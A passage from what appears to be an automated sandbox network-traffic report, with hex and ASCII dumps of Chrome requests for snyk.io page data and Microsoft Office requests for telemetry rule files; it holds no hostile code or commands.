                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC16384INData Raw: 6f 2d 64 61 79 20 76 75 6c 6e 65 72 61 62 69 6c 69 74 69 65 73 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 46 69 78 20 74 68 65 20 66 69 72 73 74 20 64 61 79 20 77 69 74 68 20 53 6e 79 6b 20 22 2c 22 75 72 6c 22 3a 22 2f 73 6f 6c 75 74 69 6f 6e 73 2f 7a 65 72 6f 2d 64 61 79 2d 76 75 6c 6e 65 72 61 62 69 6c 69 74 79 2d 73 65 63 75 72 69 74 79 2f 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 69 6e 66 6f 2d 77 61 72 6e 69 6e 67 22 7d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 33 45 59 46 52 39 44 66 34 4d 38 75 4f 6b 6d 41 79 37 77 54 39 5a 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61
                                                                                                                                                                                                                                                                                                              Data Ascii: o-day vulnerabilities","description":"Fix the first day with Snyk ","url":"/solutions/zero-day-vulnerability-security/","appearance":{"navItem":{"icon":"info-warning"}}},{"sys":{"id":"3EYFR9Df4M8uOkmAy7wT9Z","__typename":"Sys"},"__typename":"ContentNaviga
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC1032INData Raw: 69 74 74 65 72 2e 63 6f 6d 2f 73 6e 79 6b 73 65 63 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 33 73 31 4e 72 57 39 66 68 41 49 34 39 61 31 42 52 6a 4e 66 75 79 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 79 6f 75 74 75 62 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 63 68 61 6e 6e 65 6c 2f 55 43 68 34 64 4a 7a 63 74 62 30 4e 68 53 69 62 6a 55 2d 65 32 50 36 77 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 33 72 72 42 6a 69 72 46 33 30 73 4e 49 39 64 37 72 4d 53 31 4d 79 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22
                                                                                                                                                                                                                                                                                                              Data Ascii: itter.com/snyksec"},{"sys":{"id":"3s1NrW9fhAI49a1BRjNfuy","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"youtube","url":"https://www.youtube.com/channel/UCh4dJzctb0NhSibjU-e2P6w"},{"sys":{"id":"3rrBjirF30sNI9d7rMS1My","__typename":"Sys"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC4986INData Raw: 30 30 30 30 31 33 36 45 0d 0a 73 22 3a 7b 22 69 64 22 3a 22 32 6c 42 56 41 77 62 7a 50 36 62 41 30 73 37 32 65 47 6b 71 56 6a 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 75 72 6c 22 3a 22 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2d 6f 66 2d 73 65 72 76 69 63 65 2f 22 2c 22 6c 61 62 65 6c 22 3a 22 4c 65 67 61 6c 20 74 65 72 6d 73 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 34 71 66 64 49 65 75 52 58 4f 77 6c 54 57 74 54 6b 66 6a 78 79 77 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000136Es":{"id":"2lBVAwbzP6bA0s72eGkqVj","__typename":"Sys"},"__typename":"ContentNavigationItem","url":"/policies/terms-of-service/","label":"Legal terms"},{"sys":{"id":"4qfdIeuRXOwlTWtTkfjxyw","__typename":"Sys"},"__typename":"ContentNavigationItem",
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              117192.168.2.54987623.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC624OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/snyk-top-10.json?slug=snyk-top-10 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC623INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"eebwjyvfve1oto"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/[...slug].json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::rd8r8-1729799353625-a15533a1c836
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:13 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799353.1f6149f
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC15761INData Raw: 30 30 30 30 43 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 33 5a 43 77 43 6f 59 49 54 54 69 7a 38 72 32 30 57 41 69 34 44 30 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 33 2d 31 35 54 31 34 3a 33 38 3a 30 31 2e 30 31 32 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 37 2d 31 38 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3ZCwCoYITTiz8r20WAi4D0","type":"Entry","createdAt":"2023-03-15T14:38:01.012Z","updatedAt":"2023-07-18T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC15993INData Raw: 74 61 64 61 74 61 22 3a 5b 5d 2c 22 70 75 62 6c 69 63 5f 69 64 22 3a 22 73 6e 79 6b 2d 74 6f 70 2d 31 30 2f 66 65 61 74 75 72 65 2d 73 6e 79 6b 2d 74 6f 70 2d 31 30 2d 63 6f 64 65 2d 6a 61 76 61 73 63 72 69 70 74 2d 6f 70 61 6c 22 2c 22 63 72 65 61 74 65 64 5f 61 74 22 3a 22 32 30 32 33 2d 30 33 2d 31 34 54 31 37 3a 34 35 3a 34 39 5a 22 2c 22 73 65 63 75 72 65 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 73 2e 63 6c 6f 75 64 69 6e 61 72 79 2e 63 6f 6d 2f 73 6e 79 6b 2f 69 6d 61 67 65 2f 75 70 6c 6f 61 64 2f 76 31 36 37 38 38 31 35 39 34 39 2f 73 6e 79 6b 2d 74 6f 70 2d 31 30 2f 66 65 61 74 75 72 65 2d 73 6e 79 6b 2d 74 6f 70 2d 31 30 2d 63 6f 64 65 2d 6a 61 76 61 73 63 72 69 70 74 2d 6f 70 61 6c 2e 70 6e 67 22 2c 22 72 65 73 6f 75 72 63 65 5f 74 79
                                                                                                                                                                                                                                                                                                              Data Ascii: tadata":[],"public_id":"snyk-top-10/feature-snyk-top-10-code-javascript-opal","created_at":"2023-03-14T17:45:49Z","secure_url":"https://res.cloudinary.com/snyk/image/upload/v1678815949/snyk-top-10/feature-snyk-top-10-code-javascript-opal.png","resource_ty
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC16384INData Raw: 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 36 34 2c 22 72 65 76 69 73 69 6f 6e 22 3a 35 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 6d 6f 6c 65 63 75 6c 65 54 69 74 6c 65 54 65 78 74 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 69 6e 74 65 72 6e 61 6c 4e 61 6d 65 22 3a 22 5c 22 53 6e 79 6b 20 54 6f 70 20 31 30 5c 22 20 2d 20 6f 73 73 20 67 72 69 64 20 2d 20 74 69 74 6c 65 22 2c 22 6d 69 6e 69 48 65 61 64 65 72 22 3a 22 50 49 43 4b 20 59 4f 55 52 20 4c 41 4e 47 55 41 47 45 22 2c 22 68 65 61
                                                                                                                                                                                                                                                                                                              Data Ascii: nvironment"}},"publishedVersion":64,"revision":5,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"moleculeTitleText"}},"locale":"en-US"},"fields":{"internalName":"\"Snyk Top 10\" - oss grid - title","miniHeader":"PICK YOUR LANGUAGE","hea
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC1026INData Raw: 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 34 36 2c 22 72 65 76 69 73 69 6f 6e 22 3a 31 33 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 6d 6f 6c 65 63 75 6c 65 50 72 69 63 69 6e 67 43 61 72 64 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 69 6e 74 65 72 6e 61 6c 4e 61 6d 65 22 3a 22 5c 22 53 65 65 20 53 6e 79 6b 20 69 6e 20 61 63 74 69 6f 6e 5c 22 20 2d 20 64 65 6d
                                                                                                                                                                                                                                                                                                              Data Ascii: :{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":46,"revision":13,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"moleculePricingCard"}},"locale":"en-US"},"fields":{"internalName":"\"See Snyk in action\" - dem
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 63 66 31 36 4c 30 51 70 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 33 2d 32 30 54 31 34 3a 33 36 3a 30 34 2e 34 32 33 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 35 2d 32 31 54 30 34 3a 31 35 3a 34 39 2e 37 34 30 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 32 30 2c 22 72 65 76 69 73 69 6f 6e 22 3a 38 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000cf16L0Qp","type":"Entry","createdAt":"2023-03-20T14:36:04.423Z","updatedAt":"2024-05-21T04:15:49.740Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":20,"revision":8,"contentType":{"sys":{"type":"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC12INData Raw: 6e 6f 77 66 6c 61 6b 65 2e 6a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: nowflake.j
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC13328INData Raw: 30 30 30 30 33 34 30 34 0d 0a 70 67 22 2c 22 74 61 67 73 22 3a 6e 75 6c 6c 2c 22 74 79 70 65 22 3a 22 75 70 6c 6f 61 64 22 2c 22 62 79 74 65 73 22 3a 36 34 36 36 32 2c 22 77 69 64 74 68 22 3a 31 32 30 30 2c 22 66 6f 72 6d 61 74 22 3a 22 6a 70 67 22 2c 22 68 65 69 67 68 74 22 3a 36 32 38 2c 22 76 65 72 73 69 6f 6e 22 3a 31 37 31 37 34 36 31 38 35 36 2c 22 64 75 72 61 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 7d 2c 22 70 75 62 6c 69 63 5f 69 64 22 3a 22 66 65 61 74 75 72 65 2d 73 6e 79 6b 2d 73 6e 6f 77 66 6c 61 6b 65 22 2c 22 63 72 65 61 74 65 64 5f 61 74 22 3a 22 32 30 32 34 2d 30 36 2d 30 34 54 30 30 3a 34 34 3a 31 36 5a 22 2c 22 73 65 63 75 72 65 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 73 2e 63 6c 6f 75 64 69 6e 61
                                                                                                                                                                                                                                                                                                              Data Ascii: 00003404pg","tags":null,"type":"upload","bytes":64662,"width":1200,"format":"jpg","height":628,"version":1717461856,"duration":null,"metadata":{},"public_id":"feature-snyk-snowflake","created_at":"2024-06-04T00:44:16Z","secure_url":"https://res.cloudina
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              118192.168.2.54988023.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC600OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/blog.json HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC495INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /en-US/blog
                                                                                                                                                                                                                                                                                                              X-Middleware-Skip: 1
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::2mnrv-1729799353683-a90d6d9158ce
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:13 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 3
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799353.1f614ba
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC3INData Raw: 7b 7d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: {}


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              119192.168.2.54988413.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:13 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 499
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 66384a0c-801e-002a-112b-2631dc000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194913Z-15b8d89586f8l5961kfst8fpb000000009u000000000bd88
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              120192.168.2.54987513.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:13 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 404
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 9956b93e-101e-0017-0e1a-2447c7000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194913Z-r197bdfb6b4gx6v9pg74w9f47s000000016g00000000xey1
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              121192.168.2.54988123.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC625OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/podcasts/the-secure-developer.json HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC520INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /en-US/podcasts/the-secure-developer
                                                                                                                                                                                                                                                                                                              X-Middleware-Skip: 1
